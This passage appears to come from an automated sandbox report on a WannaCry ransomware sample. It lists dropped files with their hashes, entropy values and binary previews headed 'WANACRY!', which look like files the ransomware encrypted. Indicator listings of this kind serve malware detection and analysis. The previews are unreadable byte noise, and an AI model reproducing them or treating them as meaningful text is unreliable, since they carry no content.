                                                                                      Preview:WANACRY!....M9...../....Ob.TD"u0.xu...H..S....o.....T...Dd.}C.......h...U...Z.e&,..!W..#|..m.[{E..z..1...F;..xxg&...t.'....>Ttu.[.k..4.'.[.[....D.....-...!pJg9.......a.`.`..;[....d..C.w......Wd.4.....{..L.'H_X4.'.}..1K....t^I.vP.l1..../.ITL....i.....'..L.d............B.E...lEa.J.2.+.pW.G..D-)....(.c=...."..7>..?.........;..=...U.........r.A\.}..F.Yx......9.?B......Xh.K......s`{.\..0.....O..H...@.5b...u./.V.J....6.'..F.....Ek.b...*..50j#|~...V.....(..?.<Z.,....1....v..:m.........+..".M.r .?W_./..nA..^.Y..r.8z.J....].A..F...:.|.C.&..TGOT=..cE.A=./".....A0.......T.z.y$=...h....K6...R.2...\..(.{....K..!s./J...@..\..8eb.L.r..".}.7..#+...AW.f....F.z=.........j..x.T..b...d...&*..s...]..d..[...Jn.......HN .KI...l)A.k.X.xW.REjnPm..H.."O....W./Q[~.Od....x..W.M.;..N.~....Q....S6?.;...9.9.........}...\.V...8..Qr,.x}Dn...=.O.2P.po..x..p.V..0!zV..A.K..hT....F...J.m..tm..O......X.|....|.`<...9.u#.9SVI.9.N..dfR....Ll..j\.p.......5.k..0.9n......~../..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2008
                                                                                      Entropy (8bit):7.9001042889229005
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkx2V/YcJy5N+C4TZ7x2APTgkDJSKGskNV2wOnFFTbc5nc:ox2JYcJyn+5T/2ggmRkNVGVync
                                                                                      MD5:749787C4EA9CC17EBA3C4E016096ADCA
                                                                                      SHA1:E53D15DD2D3692B0AD528056EE7A6A0C5BFCCF69
                                                                                      SHA-256:75DD9105792698E195F71B522FD2F96337A9EFFE1AB8465DF7DCD5F0270A54BF
                                                                                      SHA-512:CDB03707A9FE31188C893F46395AA240812C96A5975EA200DF3777E4DB9EFB98E37E0FEF5708C9383E0487239F7C5AA107B2E612E850FB0EADB2AFD830F741ED
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....M9...../....Ob.TD"u0.xu...H..S....o.....T...Dd.}C.......h...U...Z.e&,..!W..#|..m.[{E..z..1...F;..xxg&...t.'....>Ttu.[.k..4.'.[.[....D.....-...!pJg9.......a.`.`..;[....d..C.w......Wd.4.....{..L.'H_X4.'.}..1K....t^I.vP.l1..../.ITL....i.....'..L.d............B.E...lEa.J.2.+.pW.G..D-)....(.c=...."..7>..?.........;..=...U.........r.A\.}..F.Yx......9.?B......Xh.K......s`{.\..0.....O..H...@.5b...u./.V.J....6.'..F.....Ek.b...*..50j#|~...V.....(..?.<Z.,....1....v..:m.........+..".M.r .?W_./..nA..^.Y..r.8z.J....].A..F...:.|.C.&..TGOT=..cE.A=./".....A0.......T.z.y$=...h....K6...R.2...\..(.{....K..!s./J...@..\..8eb.L.r..".}.7..#+...AW.f....F.z=.........j..x.T..b...d...&*..s...]..d..[...Jn.......HN .KI...l)A.k.X.xW.REjnPm..H.."O....W./Q[~.Od....x..W.M.;..N.~....Q....S6?.;...9.9.........}...\.V...8..Qr,.x}Dn...=.O.2P.po..x..p.V..0!zV..A.K..hT....F...J.m..tm..O......X.|....|.`<...9.u#.9SVI.9.N..dfR....Ll..j\.p.......5.k..0.9n......~../..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2937064
                                                                                      Entropy (8bit):7.999946183026512
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:W361/HaylKpNHzeus3azris/HhRN0E5i/CebY+j7qd6M8uONL0GtcY5VBvh3zb5L:Y61VKXyfaz//Hh0Ed1+j7S6LDN7cYjdj
                                                                                      MD5:8BC4207F9C3F19F2098B020C396F56F5
                                                                                      SHA1:8940AE6C6C3F62D1D184BD6BBDE377981B64FCD7
                                                                                      SHA-256:43754FEB350DFACF75069EF1A1FB1CD09C917A0428163AC1ED2C7B5B57444EC2
                                                                                      SHA-512:433B6A244C58B96B4440AA00343D411865B6BB60708D861166314A7EF2ACE0DDAA11FCFCB3591B1993ACE5841D196ED839391C68A5B1A6C3FEB34BA853E7EC56
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....b.Jf.....3v.....*PiT.{...UN5..b.,.b.....Ki..U...Qh'....8.E..y.*......./.I....\..P...)w.[s....)g..s.7.i.....}.r.f....i.........4..ZQ#1{#|.&1.h...{....(...Y....8....&6..Hn....#.v.i.$2..PhY..1,+[:.wF.'...h.#im`7,.0..Ng.u<.g...."8}.xY..I0J..$V..C......,......t.3.o.zm.....9o.W.<...V.....i...7g.}.F............E2.`c...\=}h..fex..D.G.l;......=....`>SC...&.l.a4f..4u...x2}[.E9}39F.2.....(c...$..h..w._........(.\".,[/..lc..Qj.v..9Z..?.....;..G.^7.._..Al....}c.3.G9.)...&&/\z.r5......d.t"..Z!N*...l)..$.r..P..S...*...^...6I.......W>..%....@i.........l)+.1.....\2..R...6.7..E".<.}..~..`./.....6.."..5Vp.Rs%...........W*....&.O~...~... <...}..W...~2u..\.$.O...it..WHd.....z..J9...Z%8.../)A.d..en.!i..Qa...S6'.....P.y.........h9.`.?...ryp.b{.P.....0.|}...0u...(96E...l5Qf..AF1Uzd.%.5...>..n.g.....G".b~J.0..^.o./q.X.D..Ky.-...H..<.m..6.&..E.>.F\.......%...kd...<...x~....u.R.z$N./.......:....F...yf.}.Ij...@.E.._.p..!........k...1....O.3...p1t.E...P6.!..,
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2937064
                                                                                      Entropy (8bit):7.999946183026512
                                                                                      Encrypted:true
                                                                                      SSDEEP:49152:W361/HaylKpNHzeus3azris/HhRN0E5i/CebY+j7qd6M8uONL0GtcY5VBvh3zb5L:Y61VKXyfaz//Hh0Ed1+j7S6LDN7cYjdj
                                                                                      MD5:8BC4207F9C3F19F2098B020C396F56F5
                                                                                      SHA1:8940AE6C6C3F62D1D184BD6BBDE377981B64FCD7
                                                                                      SHA-256:43754FEB350DFACF75069EF1A1FB1CD09C917A0428163AC1ED2C7B5B57444EC2
                                                                                      SHA-512:433B6A244C58B96B4440AA00343D411865B6BB60708D861166314A7EF2ACE0DDAA11FCFCB3591B1993ACE5841D196ED839391C68A5B1A6C3FEB34BA853E7EC56
                                                                                      Malicious:true
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....b.Jf.....3v.....*PiT.{...UN5..b.,.b.....Ki..U...Qh'....8.E..y.*......./.I....\..P...)w.[s....)g..s.7.i.....}.r.f....i.........4..ZQ#1{#|.&1.h...{....(...Y....8....&6..Hn....#.v.i.$2..PhY..1,+[:.wF.'...h.#im`7,.0..Ng.u<.g...."8}.xY..I0J..$V..C......,......t.3.o.zm.....9o.W.<...V.....i...7g.}.F............E2.`c...\=}h..fex..D.G.l;......=....`>SC...&.l.a4f..4u...x2}[.E9}39F.2.....(c...$..h..w._........(.\".,[/..lc..Qj.v..9Z..?.....;..G.^7.._..Al....}c.3.G9.)...&&/\z.r5......d.t"..Z!N*...l)..$.r..P..S...*...^...6I.......W>..%....@i.........l)+.1.....\2..R...6.7..E".<.}..~..`./.....6.."..5Vp.Rs%...........W*....&.O~...~... <...}..W...~2u..\.$.O...it..WHd.....z..J9...Z%8.../)A.d..en.!i..Qa...S6'.....P.y.........h9.`.?...ryp.b{.P.....0.|}...0u...(96E...l5Qf..AF1Uzd.%.5...>..n.g.....G".b~J.0..^.o./q.X.D..Ky.-...H..<.m..6.&..E.>.F\.......%...kd...<...x~....u.R.z$N./.......:....F...yf.}.Ij...@.E.._.p..!........k...1....O.3...p1t.E...P6.!..,
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1160
                                                                                      Entropy (8bit):7.82260417848469
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bknGGBP6sAhVYzlMCNYxwCZyPIhLhtZdRh3LS3jelO3ZqXN1A+9wcWjC:bkGGZ6sdzyTO1ghL9dfLSzeUWA+9l/
                                                                                      MD5:348DEDEB2E0722EBB0F8B20FFA9A9C51
                                                                                      SHA1:FA6B8948A9E753C7C75BE4B8B26BAAC1BD810588
                                                                                      SHA-256:EE3120124C97A08C3B5F30C57CAB1883C5707CE59940B6D36E2ECD78CB749431
                                                                                      SHA-512:F7AF8ACE6A96B4947E2C5D7E1BA270F5E9B2A6D15238A3831C3DBABBB00A007180D9ED85D15985DDAAC43FE2ABE23F392653D2183999C536A510E4950856124F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!................}..*..r\2%<&.j.(T.r..E.Z1.q.....lg.k'h&B..H..........d.....yE.uW....X.\")..!.I.~.>1f."X.`X..$..3,....t.[..I.y..6v.).9.5wa.)'..F.ro..(e...k.2[...{....e..%..^]...O.;.?./...Y...*?...od....w#0W..@..L~Dem......y*...n6.....-.9....#..x....a........[....+...{.>....P_..j..g..!....Cc.{01Kd.<..^.....N.|.Mv.0)~z.]m..S.ot.XOP./..hh.....uA....n.J.......J...~.._.Kv..9.1.-..P.U1]6 .(!]...4f..W...i7...1B9..AC5....K.>.j.HUoB.|.R.....k...wd.....(y.`..L....'.q....Y.X@...t..C'P..E..*)...0..=..c+....CR../HW.h..v..|.m...Q;.r*...3.O..y....g7._........n..........AS.$..I.*E.F..K..3...."GgjxW.*....v...qM.`+.).....Ao..|..N._..C.Y..kr~..\v/.t.|S..,..Y......xM#..=3.\....q._+..?T...hE|.a.H........^.....O..6*....s..5nf..3w.z.......DK1.J.....5.1s.k,.........@T.I..a..../.......X.2...f.y.....V...)..AH....v...x...,.a.G4J..%VH.xe....8.=\.C..~.....~.aD...2..c..u.....xa.+%.[Z8 ..34..x..........%..A..L..c)..~.v.a.<..}.blG...c.c|.<38..s......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1160
                                                                                      Entropy (8bit):7.82260417848469
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bknGGBP6sAhVYzlMCNYxwCZyPIhLhtZdRh3LS3jelO3ZqXN1A+9wcWjC:bkGGZ6sdzyTO1ghL9dfLSzeUWA+9l/
                                                                                      MD5:348DEDEB2E0722EBB0F8B20FFA9A9C51
                                                                                      SHA1:FA6B8948A9E753C7C75BE4B8B26BAAC1BD810588
                                                                                      SHA-256:EE3120124C97A08C3B5F30C57CAB1883C5707CE59940B6D36E2ECD78CB749431
                                                                                      SHA-512:F7AF8ACE6A96B4947E2C5D7E1BA270F5E9B2A6D15238A3831C3DBABBB00A007180D9ED85D15985DDAAC43FE2ABE23F392653D2183999C536A510E4950856124F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!................}..*..r\2%<&.j.(T.r..E.Z1.q.....lg.k'h&B..H..........d.....yE.uW....X.\")..!.I.~.>1f."X.`X..$..3,....t.[..I.y..6v.).9.5wa.)'..F.ro..(e...k.2[...{....e..%..^]...O.;.?./...Y...*?...od....w#0W..@..L~Dem......y*...n6.....-.9....#..x....a........[....+...{.>....P_..j..g..!....Cc.{01Kd.<..^.....N.|.Mv.0)~z.]m..S.ot.XOP./..hh.....uA....n.J.......J...~.._.Kv..9.1.-..P.U1]6 .(!]...4f..W...i7...1B9..AC5....K.>.j.HUoB.|.R.....k...wd.....(y.`..L....'.q....Y.X@...t..C'P..E..*)...0..=..c+....CR../HW.h..v..|.m...Q;.r*...3.O..y....g7._........n..........AS.$..I.*E.F..K..3...."GgjxW.*....v...qM.`+.).....Ao..|..N._..C.Y..kr~..\v/.t.|S..,..Y......xM#..=3.\....q._+..?T...hE|.a.H........^.....O..6*....s..5nf..3w.z.......DK1.J.....5.1s.k,.........@T.I..a..../.......X.2...f.y.....V...)..AH....v...x...,.a.G4J..%VH.xe....8.=\.C..~.....~.aD...2..c..u.....xa.+%.[Z8 ..34..x..........%..A..L..c)..~.v.a.<..}.blG...c.c|.<38..s......
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2600
                                                                                      Entropy (8bit):7.929634303604968
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkpckOg3zFnqIMDbfjtTE3uJn0sFPxF52ulbxiCLotLm8qb2GwYQbG:opd/Rt6hwWhFpW0xiTJm8qCGnQa
                                                                                      MD5:2A4E7B092ADA9A037C61816AA3C2E882
                                                                                      SHA1:789367DAC10C427842E28BC525EA11450F41631B
                                                                                      SHA-256:1B4EC563C0D23F24DB8657A1D8E4BFF5FCA2A86947ED601AF387622968421100
                                                                                      SHA-512:8D009FF3FE518EDC5B1A56C8C5E9C33859A24253A44906B0D8C6B224EA3B32DDC30BC19D5E1F19DF2A5C8553DBC27C6FE36AE59889DCFB99E1C82679174981C3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....|...p,.x...{.2.....)......../'r.SY.Awp..[...^..Y...L...|h.j...........iv*.......fJ...)~P?.=<+....??Y.4.W.F[.$I.. ...".Q[..`.2..3.....;.8..6.=.O.4..y.>.......Hw.......n.o.F......5...p..xF.`...s.f.q..S...{.(.k.......;W....0..{5]E.N.\.h....................M....Y.-.._......>..A...fY.C.|)..\";...U....j(F>..f..l...\..9.y...ar.",L........ga....8l..~..s..[.....$...U..H.._.Z.j...[.....M.....B.\.f....@?J.g.:.>..seC.......c..........iCY."..2...^^.b,...........]o.....0[.9&..].....b.U..mU(~d1....*.4...........z.#+S.\..{'..&.....[......^....g.....l`..$.......8..x}-N...%.L3....6..D........;..f.....@..n...-~.W...W.OT......w...Y..9.s.+..b............t..,T$n'.a7.h'.....Fw...W..=...UT.*?...:.L...tp..kl....S.4..0Q.XK...Z..F..m.H.VTVA.O..O............MQ.u.r.2....0...-...B.[1.]e?..g.Cz.*.^.58Y....#.....k...B....".<.7b..NBfm,.G.?.#-8..;j......N....TO.u.....Y/...@..}l.,u./}.u...{....N.'v.b.,P..].;..hS....3".7.o.+...H*B..]5..Z..r.>gr.(g..kmQ
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2600
                                                                                      Entropy (8bit):7.929634303604968
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkpckOg3zFnqIMDbfjtTE3uJn0sFPxF52ulbxiCLotLm8qb2GwYQbG:opd/Rt6hwWhFpW0xiTJm8qCGnQa
                                                                                      MD5:2A4E7B092ADA9A037C61816AA3C2E882
                                                                                      SHA1:789367DAC10C427842E28BC525EA11450F41631B
                                                                                      SHA-256:1B4EC563C0D23F24DB8657A1D8E4BFF5FCA2A86947ED601AF387622968421100
                                                                                      SHA-512:8D009FF3FE518EDC5B1A56C8C5E9C33859A24253A44906B0D8C6B224EA3B32DDC30BC19D5E1F19DF2A5C8553DBC27C6FE36AE59889DCFB99E1C82679174981C3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....|...p,.x...{.2.....)......../'r.SY.Awp..[...^..Y...L...|h.j...........iv*.......fJ...)~P?.=<+....??Y.4.W.F[.$I.. ...".Q[..`.2..3.....;.8..6.=.O.4..y.>.......Hw.......n.o.F......5...p..xF.`...s.f.q..S...{.(.k.......;W....0..{5]E.N.\.h....................M....Y.-.._......>..A...fY.C.|)..\";...U....j(F>..f..l...\..9.y...ar.",L........ga....8l..~..s..[.....$...U..H.._.Z.j...[.....M.....B.\.f....@?J.g.:.>..seC.......c..........iCY."..2...^^.b,...........]o.....0[.9&..].....b.U..mU(~d1....*.4...........z.#+S.\..{'..&.....[......^....g.....l`..$.......8..x}-N...%.L3....6..D........;..f.....@..n...-~.W...W.OT......w...Y..9.s.+..b............t..,T$n'.a7.h'.....Fw...W..=...UT.*?...:.L...tp..kl....S.4..0Q.XK...Z..F..m.H.VTVA.O..O............MQ.u.r.2....0...-...B.[1.]e?..g.Cz.*.^.58Y....#.....k...B....".<.7b..NBfm,.G.?.#-8..;j......N....TO.u.....Y/...@..}l.,u./}.u...{....N.'v.b.,P..].;..hS....3".7.o.+...H*B..]5..Z..r.>gr.(g..kmQ
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6856
                                                                                      Entropy (8bit):7.970710337094888
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oHIzqLjzjbls2/3jOiw56nXLCjPQjX/w0lhocpBFn/bsWoRNfs1eN9GM820DdqkM:nKDblD3jOiD2wdpBFIWoRNU166gHx
                                                                                      MD5:24DB0634EA2E607D92EF983BB27A6709
                                                                                      SHA1:26AC6D3D0C41B85D18073EEFD991328B6F933A20
                                                                                      SHA-256:73686EB090D61D13A7B2A2107ACD0997D0267556B3A8A1EAA4704C8551E78373
                                                                                      SHA-512:377A4A187B2F339DDF763888894AB5E0A6FBA0DF26B4A6A996C5E82A68E2D3E2D1BF3FBF03CCCBEB3FEAA5608CA90BAC0A74E8DD26BE21AB999DDF18B0667575
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......W...z@BS^.2s.@=.h.K[^@..S.wm.x3..t.P.u.CY....7.D.....K.wk..Z1..E.\...T...y...m0.7.|...gem:.I...j4.K...!,<-.p.C..\.|\.J..mK.a..&._. ....{U.S....4...t.c{.\j.<......+.....]..(.c..K.R8G.`43.. ...a...#.9,Z.G.....~.d>...^..sBE..r. .=,.^....s..8.T.3..............$.q^`.,..sM....,VX^v...g.'S@.w.V....2.F......P..5..,.b.~,.9xZ.#.LQ.1Y.tM..J.%.....a.vtdAc/.].....i.2......J.S...Z<.`.......T..y-...`..a.2...$...0..T...S....`Do]j|L......D'Rt.I.}............i..Ut.V....d.B.\G.:.<S...W.8OM..c.......]6*g...w..x?..~..bf.>.W~d.RH\.gl.!]M...g......X..D.....}|b.......C..; 2.3F=...*..w...._N..,}.I.G.z.7.T......9?X].=g.......Fyr...QHs\.i.....|..0.D.....M...+.%y.-.91..8.}..U&W..e.6.s..;.`..Wg.#.E..t...i.._@.Ud....m...5.'.i.2,....s.+......NFX..1....F.}.*......)P-.s.v...O....E.....).&g0.z.....O.j....._?.V.`A..\;..I.WkX..A..{.M....PT...pc^.g?...NJ\N.}...j.._u]&..f.<-.oH4..U..P.b}..Mhh+.Q......Q.oA.O. ........G..%%_......A.V.yH....E..g#.0........,3.....np..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):6856
                                                                                      Entropy (8bit):7.970710337094888
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oHIzqLjzjbls2/3jOiw56nXLCjPQjX/w0lhocpBFn/bsWoRNfs1eN9GM820DdqkM:nKDblD3jOiD2wdpBFIWoRNU166gHx
                                                                                      MD5:24DB0634EA2E607D92EF983BB27A6709
                                                                                      SHA1:26AC6D3D0C41B85D18073EEFD991328B6F933A20
                                                                                      SHA-256:73686EB090D61D13A7B2A2107ACD0997D0267556B3A8A1EAA4704C8551E78373
                                                                                      SHA-512:377A4A187B2F339DDF763888894AB5E0A6FBA0DF26B4A6A996C5E82A68E2D3E2D1BF3FBF03CCCBEB3FEAA5608CA90BAC0A74E8DD26BE21AB999DDF18B0667575
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......W...z@BS^.2s.@=.h.K[^@..S.wm.x3..t.P.u.CY....7.D.....K.wk..Z1..E.\...T...y...m0.7.|...gem:.I...j4.K...!,<-.p.C..\.|\.J..mK.a..&._. ....{U.S....4...t.c{.\j.<......+.....]..(.c..K.R8G.`43.. ...a...#.9,Z.G.....~.d>...^..sBE..r. .=,.^....s..8.T.3..............$.q^`.,..sM....,VX^v...g.'S@.w.V....2.F......P..5..,.b.~,.9xZ.#.LQ.1Y.tM..J.%.....a.vtdAc/.].....i.2......J.S...Z<.`.......T..y-...`..a.2...$...0..T...S....`Do]j|L......D'Rt.I.}............i..Ut.V....d.B.\G.:.<S...W.8OM..c.......]6*g...w..x?..~..bf.>.W~d.RH\.gl.!]M...g......X..D.....}|b.......C..; 2.3F=...*..w...._N..,}.I.G.z.7.T......9?X].=g.......Fyr...QHs\.i.....|..0.D.....M...+.%y.-.91..8.}..U&W..e.6.s..;.`..Wg.#.E..t...i.._@.Ud....m...5.'.i.2,....s.+......NFX..1....F.}.*......)P-.s.v...O....E.....).&g0.z.....O.j....._?.V.`A..\;..I.WkX..A..{.M....PT...pc^.g?...NJ\N.}...j.._u]&..f.<-.oH4..U..P.b}..Mhh+.Q......Q.oA.O. ........G..%%_......A.V.yH....E..g#.0........,3.....np..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8984
                                                                                      Entropy (8bit):7.979676295865378
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:0PRfy8XzQrDw/zPjP8W7NSX/3qmOKDGHNdP+lEc/9mgVoAICFqPGvW:0P8NDw/zrvYXvqm9iPoEc9VNtMP/
                                                                                      MD5:878D9ACEBB921D298010C55D7A4AC5B6
                                                                                      SHA1:6229E40ECE5C047B039403B730F44CC128457B33
                                                                                      SHA-256:70AEF352E6E3D274BF4E1FD77DEBA82D119C52A0918A48E3397D0095D30D83D7
                                                                                      SHA-512:13CD01F6068E5F9D787254FF6B05AACD5B4ED6C35A78A0E915D00C3990B9A21FF01603C1776494F35F72824E900E24588B8F30FAA6CE3851C361EF74C055A9F5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Z#P.:!<.....A....#...(.S.T.9.'..G^.{`.Pq$U......\......>.J.WK.D..Z...OGQ#$.[i+f7w..]U..6~.L.......i8Z.....6`.=.%3...X.v.. 2....(?o..^...f......h..N....m..Z..A]4ZX......H....Z..4.Z..g.#...,.cK.O..x.16UB..L.ud......>.M.j.."....U.=&........o.j]B......!..........buuF.. w:.....oZX..Zxs}.v&x..!g...4Z.y...5Oot.b.E....K....v....2..8.p.?.#.|+.j....5.E...7....U.a.i.(..4.....f..]. i....)..7.~:KG..j..e.o-.'.R.**$2......w..k:.t.......ki.#..MW.=.J...*... .'...o..0.....{......i...S.........k.gz...[b[.....I...Hf..w.61|....p....`G##Sn.P.^K.....X=...ZaV....R*.@.../..D...?8.X.C[...Z...@K.r..v...Y.W.F.+...%..w....i>.m...+....4?.U.{CW.1.rzG......r.....(....ua"_&..<.Y\(.yX,l..g..!.ca#Q.*..<...g.I...b.!.L....a.I.....q.Q..:4N!._G..R.d.p.....^...x."FdN.....m.`.....6....N...*c...q.v...*...oJ.o(.x.mqu.Rp.>.8..\.|..A.....%..?.8.$.....V%.V.~^.Kux..7..r....Y....(.6Ol..<p.....={\...K..>....<...Zh.[.m..D!.s]..T..._W..I.B. .@.*.o.ZQ...u..=.....v....K....u%..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8984
                                                                                      Entropy (8bit):7.979676295865378
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:0PRfy8XzQrDw/zPjP8W7NSX/3qmOKDGHNdP+lEc/9mgVoAICFqPGvW:0P8NDw/zrvYXvqm9iPoEc9VNtMP/
                                                                                      MD5:878D9ACEBB921D298010C55D7A4AC5B6
                                                                                      SHA1:6229E40ECE5C047B039403B730F44CC128457B33
                                                                                      SHA-256:70AEF352E6E3D274BF4E1FD77DEBA82D119C52A0918A48E3397D0095D30D83D7
                                                                                      SHA-512:13CD01F6068E5F9D787254FF6B05AACD5B4ED6C35A78A0E915D00C3990B9A21FF01603C1776494F35F72824E900E24588B8F30FAA6CE3851C361EF74C055A9F5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Z#P.:!<.....A....#...(.S.T.9.'..G^.{`.Pq$U......\......>.J.WK.D..Z...OGQ#$.[i+f7w..]U..6~.L.......i8Z.....6`.=.%3...X.v.. 2....(?o..^...f......h..N....m..Z..A]4ZX......H....Z..4.Z..g.#...,.cK.O..x.16UB..L.ud......>.M.j.."....U.=&........o.j]B......!..........buuF.. w:.....oZX..Zxs}.v&x..!g...4Z.y...5Oot.b.E....K....v....2..8.p.?.#.|+.j....5.E...7....U.a.i.(..4.....f..]. i....)..7.~:KG..j..e.o-.'.R.**$2......w..k:.t.......ki.#..MW.=.J...*... .'...o..0.....{......i...S.........k.gz...[b[.....I...Hf..w.61|....p....`G##Sn.P.^K.....X=...ZaV....R*.@.../..D...?8.X.C[...Z...@K.r..v...Y.W.F.+...%..w....i>.m...+....4?.U.{CW.1.rzG......r.....(....ua"_&..<.Y\(.yX,l..g..!.ca#Q.*..<...g.I...b.!.L....a.I.....q.Q..:4N!._G..R.d.p.....^...x."FdN.....m.`.....6....N...*c...q.v...*...oJ.o(.x.mqu.Rp.>.8..\.|..A.....%..?.8.$.....V%.V.~^.Kux..7..r....Y....(.6Ol..<p.....={\...K..>....<...Zh.[.m..D!.s]..T..._W..I.B. .@.*.o.ZQ...u..=.....v....K....u%..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7384
                                                                                      Entropy (8bit):7.971287141910158
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:FqSjtbaJ/vT73F2kF+SM6Wv/NB/EJzWpx:IStaJXT73FJFOZv/N9z7
                                                                                      MD5:5500B40C9ED88C59D68F7154D4592658
                                                                                      SHA1:7833AC708A89CE9AA10806063EA0A05F59F1878A
                                                                                      SHA-256:AE34064EDD645707F8CFC3DD3E2E0B1AC44AFE7824340FB0E9CD8F4B9CE6820D
                                                                                      SHA-512:3CB4E99A7FF13A694475EE5C56ACF168CF511BD4E3028EC9CCDC6C227933C27B27B0740E1A18CF3BB487CF55C8563088362524649CF26B9EE08665E8914624F9
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....B.....?b.SP.&.J..@..!+..#..M`..D......z.....B.."..~@....A4j.O(...g]....O.d.2.f.H9.3.o........../..kA...z.q.C... ..>....^H/..p)..I.Ro..Z.H......V.........b.]ia.......8.M[d...u..s.|^..8.;6^....!.......<....;. ..p...w......\...t.r...M......../q..............P>]CJ..J..."R.^....i.P@.Q.......?%8j8..(.|...q......./z(.pw..&.>...xN..0.U.Q.a..sy;..:.b@.....q......."[.T8....|.a.t>.IN...\,rH....."....5|..."0..h.|uUC.j/!Y....y.O+AL......BH.)b......y.;...2.m..I.h.E.A.F..^..:...J..\..].N..'....$.......2C\...(.B&..\.t....A.......m.9.]*.i..1.S.%.>n.:.>f..`.........2....;Q.\..<..8.bD.....S*.C.how.6..{=.........}..Q.=..=.p..%.y.U}~r&..Pb.-.9EqQ]Y.....j3i.tjm.....?..{.gCx..cD..O.......Y.....M...WBK[......M..]...1.9..`....,*$.R..giW...mS.[..0A...;.}X.i.M.,...r..E...9.@.Q..c;.+l.I.t].k(..ky.#ZP....R\.._.p....9.......X.AiS.#......2.k....2...*...$=.f.....}.X...=..QGTm.._ ._d...kp..T..H.TD.R{.<..'.YL!]ta.b.C..%..1$....aN.X.....wh...v.......8|].YF
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7384
                                                                                      Entropy (8bit):7.971287141910158
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:FqSjtbaJ/vT73F2kF+SM6Wv/NB/EJzWpx:IStaJXT73FJFOZv/N9z7
                                                                                      MD5:5500B40C9ED88C59D68F7154D4592658
                                                                                      SHA1:7833AC708A89CE9AA10806063EA0A05F59F1878A
